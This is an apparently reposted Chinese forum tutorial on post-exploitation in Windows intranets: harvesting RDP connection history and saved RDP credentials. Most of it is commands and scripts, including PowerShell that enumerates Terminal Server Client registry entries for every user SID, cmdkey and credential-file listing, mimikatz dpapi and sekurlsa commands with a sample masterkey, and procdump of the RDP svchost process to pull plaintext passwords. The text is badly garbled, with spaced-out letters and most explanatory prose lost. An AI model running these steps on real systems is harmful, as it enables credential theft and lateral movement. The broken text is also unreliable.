[18608] 2021-08-03_内网渗透|获取远程桌面连接记录与RDP凭据

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2021-08-03_内网渗透|获取远程桌面连接记录与RDP凭据 R D P   W H O A M I   H A C K   2 0 2 1 - 0 8 - 0 3 #   , 3 #   , 1 2 #   , 2 0 W i n d o w s     W i n d o w s   广 使 使 使 R D P     R D P   使   R D P     R D P     N T U S E R . D A T       H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s U s e r n a m e H i n t
i m a g e - 2 0 2 1 0 5 2 4 0 8 4 5 5 3 4 4 7   P o w e r S h e l l   i m a g e - 2 0 2 1 0 5 2 4 0 9 3 3 2 1 7 7 5 使 使 i m a g e - 2 0 2 1 0 5 2 4 0 9 3 4 3 1 9 1 2   d i r   " R e g i s t r y : : H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s "   - N a m e ( G e t - I t e m P r o p e r t y   - P a t h   " R e g i s t r y : : H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s 1 9 2 . 1 6 8 . 9 3 . 3 0 " ) . U s e r n a m e H i n t $ R e g P a t h   =   " R e g i s t r y : : H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s " $ Q u e r y P a t h   =   d i r   $ R e g P a t h   - N a m e f o r e a c h ( $ N a m e   i n   $ Q u e r y P a t h ) {               T r y             {                     $ U s e r   =   ( G e t - I t e m P r o p e r t y   - P a t h   $ R e g P a t h $ N a m e   - E r r o r A c t i o n   S t o p   |   O u t - N u l l ) . U s e r n a m e H i n t                         W r i t e - H o s t   " S e r v e r : " $ N a m e                         W r i t e - H o s t   " U s e r : " $ U s e r " ` n "                 }                 C a t c h                     {                 W r i t e - H o s t   " N o   R D P   C o n n e c t i o n s   H i s t o r y "                 } } H K E Y _ U S E R S < S I D >
      S I D i m a g e - 2 0 2 1 0 5 2 4 0 8 5 8 4 1 5 5 5     i m a g e - 2 0 2 1 0 5 2 4 0 8 5 9 4 6 7 1 3     < S I D > H K E Y _ U S E R S S I D S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s H K E Y _ U S E R S < S I D >
i m a g e - 2 0 2 1 0 5 2 4 0 9 0 4 2 1 6 6 2   N T U S E R . D A T     H K E Y _ U S E R S     >   $ A l l U s e r   =   G e t - W m i O b j e c t   - C l a s s   W i n 3 2 _ U s e r A c c o u n t f o r e a c h ( $ U s e r   i n   $ A l l U s e r ) {         $ R e g P a t h   =   " R e g i s t r y : : H K E Y _ U S E R S " + $ U s e r . S I D + " S o f t w a r e M i c r o s o f t T e r m i n a l   S e r v e r   C l i e n t S e r v e r s "         W r i t e - H o s t   " U s e r : " $ U s e r . N a m e         W r i t e - H o s t   " S I D : " $ U s e r . S I D         W r i t e - H o s t   " S t a t u s : " $ U s e r . S t a t u s         T r y                     {                   $ Q u e r y P a t h   =   d i r   $ R e g P a t h   - N a m e   - E r r o r A c t i o n   S t o p         }         C a t c h         {                 W r i t e - H o s t   " N o   R D P   C o n n e c t i o n s   H i s t o r y "                 W r i t e - H o s t   " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "                 c o n t i n u e         }         f o r e a c h ( $ N a m e   i n   $ Q u e r y P a t h )         {                       T r y                             {                                     $ U s e r   =   ( G e t - I t e m P r o p e r t y   - P a t h   $ R e g P a t h $ N a m e   - E r r o r A c t i o n   S t o p ) . U s e r n a m e H i n t                                 W r i t e - H o s t   " S e r v e r : " $ N a m e                                 W r i t e - H o s t   " U s e r : " $ U s e r                         }                         C a t c h                             {                         W r i t e - H o s t   " N o   R D P   C o n n e c t i o n s   H i s t o r y "                         }         }         W r i t e - H o s t   " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - "         }
i m a g e - 2 0 2 1 0 5 2 4 0 9 1 0 2 6 2 4 7   N T U S E R . D A T       m o r e t z   i m a g e - 2 0 2 1 0 5 2 4 0 9 2 2 4 6 9 2 7   H K E Y _ U S E R S   C : D o c u m e n t s   a n d   S e t t i n g s N T U S E R . D A T
i m a g e - 2 0 2 1 0 5 2 4 0 9 2 4 0 4 5 3 8 h t t p s : / / g i t h u b . c o m / 3 g s t u d e n t / L i s t - R D P - C o n n e c t i o n s - H i s t o r y   R D P     l s a s s . e x e     l s a s s . e x e     E D R   便   R D P     l s a s s . e x e   R D P     s v c h o s t . e x e m s t s c . e x e   便   W i n d o w s   使   R D P   便 使   A P I     W i n d o w s   R e g   l o a d   H K E Y _ U S E R S t e s t m o r e t z   C : D o c u m e n t s   a n d   S e t t i n g s m o r e t z N T U S E R . D A T
i m a g e - 2 0 2 1 0 7 1 3 1 4 2 9 3 7 2 5 0   W i n d o w s   i m a g e - 2 0 2 1 0 7 1 3 1 4 3 7 5 9 7 6 4 C r e d e n t i a l s   使   M i m i k a t z 使 使   M i m i k a t z   M i m i k a t z     W i n d o w s     C r e d e n t i a l s   C : U s e r s < > A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s c m d k e y   / l i s t         #   d i r   / a   % u s e r p r o f i l e % A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s *         #     C r e d e n t i a l s  
i m a g e - 2 0 2 1 0 7 1 3 1 4 4 8 2 2 1 5 5   p b D a t a   g u i d M a s t e r K e y     G U I D   g u i d M a s t e r K e y       g u i d M a s t e r K e y     G U I D     M a s t e r K e y i m a g e - 2 0 2 1 0 7 1 3 1 4 5 4 3 2 9 3 3   M a s t e r K e y       M a s t e r K e y   使 使   M a s t e r K e y     4 D 8 F 5 4 3 A C D 1 0 B 1 4 3 8 4 9 4 1 4 A 5 0 8 5 F E 4 E 6 p r i v i l e g e : : d e b u g d p a p i : : c r e d   / i n : C : U s e r s b u n n y A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s 4 D 8 F 5 4 3 A C D 1 0 B 1 4 3 8 4 9 4 1 4 A 5 0 8 5 F E 4 E 6 #   m i m i k a t z . e x e   " p r i v i l e g e : : d e b u g "   " d p a p i : : c r e d   / i n : C : U s e r s < > A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s < > " { b 3 d 8 9 8 7 a - 4 2 d d - 4 c 6 b - 9 c 7 f - a 3 7 d 9 3 e 7 2 2 b 9 } p r i v i l e g e : : d e b u g s e k u r l s a : : d p a p i #   m i m i k a t z . e x e   " p r i v i l e g e : : d e b u g "   " s e k u r l s a : : d p a p i " 5 3 c 0 1 b 9 6 7 9 d c 0 e 5 5 b 9 1 5 8 4 7 8 1 f e 1 3 e b 1 c 5 f a a 2 6 9 4 f c 6 9 3 f 9 8 8 3 8 f e d d 7 4 d 3 a d 3 7 1 7 5 4 b 9 d 9 d 8 4 1 7 6 9 8 8 2 c 8 e 1 4 c 9 6 5 e 4 a e 4 0 a 4 5 d c e 8 8 1 0 1 c f 5 8 3 1 f c 4 d 6 9 4 c c 3 8 e 8 1 m i m i k a t z . e x e   " d p a p i : : c r e d   / i n : C : U s e r s b u n n y A p p D a t a L o c a l M i c r o s o f t C r e d e n t i a l s 4 D 8 F 5 4 3 A C D 1 0 B 1 4 3 8 4 9 4 1 4 A 5 0 8 5 F E 4 E 6   / m a s t e r k e y : 5 3 c 0 1 b 9 6 7 9 d c 0 e 5 5 b 9 1 5 8 4 7 8 1 f e 1 3 e b 1 c 5 f a a 2 6 9 4 f c 6 9 3 f 9 8 8 3 8 f e d d 7 4 d 3 a d 3 7 1 7 5 4 b 9 d 9 d 8 4 1 7 6 9 8 8 2 c 8 e 1 4 c 9 6 5 e 4 a e 4 0 a 4 5 d c e 8 8 1 0 1 c f 5 8 3 1 f c 4 d 6 9 4 c c 3 8 e 8 1 "
i m a g e - 2 0 2 1 0 7 1 3 1 4 5 9 4 6 9 4 9 i m a g e - 2 0 2 1 0 7 1 3 1 5 0 0 5 0 0 6 3   s v c h o s t     R D P   s v c h o s t . e x e     W i n d o w s   s v c h o s t . e x e     ( D L L )     R D P     s v c h o s t     W I n d o w s   R D P   s v c h o s t     s v c h o s t     R D P     s v c h o s t   i m a g e - 2 0 2 1 0 7 1 4 0 1 2 5 5 5 6 9 6   P I D     4 6 1 6   r d p c o r e t s . d l l s c   q u e r y e x   t e r m s e r v i c e t a s k l i s t   / M : r d p c o r e t s . d l l
i m a g e - 2 0 2 1 0 7 1 4 0 1 2 6 5 6 9 3 9   P I D     4 6 1 6 i m a g e - 2 0 2 1 0 7 1 4 0 1 2 7 4 5 6 3 9 P I D     4 6 1 6 便 P I D     4 6 1 6   便   p r o c d u m p . e x e     P I D     4 6 1 6     . d m p   i m a g e - 2 0 2 1 0 7 1 4 0 1 2 5 1 9 7 0 9   s v c h o s t . e x e _ 2 1 0 7 1 4 _ 0 1 2 4 2 6 . d m p     1 3 7   M B R D P     s t r i n g s   i m a g e - 2 0 2 1 0 7 1 4 0 1 3 4 0 2 4 2 5   R D P   M i m i k a t z     R D P   n e t s t a t   - n o b   |   S e l e c t - S t r i n g   T e r m S e r v i c e   - C o n t e x t   1 p r o c d u m p 6 4 . e x e   - m a   4 6 1 6   - a c c e p t e u l a   C : U s e r s A d m i n i s t r a t o r D e s k t o p s t r i n g s   - e l   s v c h o s t . e x e _ 2 1 0 * . d m p   |   g r e p   W h o a m i 2 0 2 1   - C 3
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则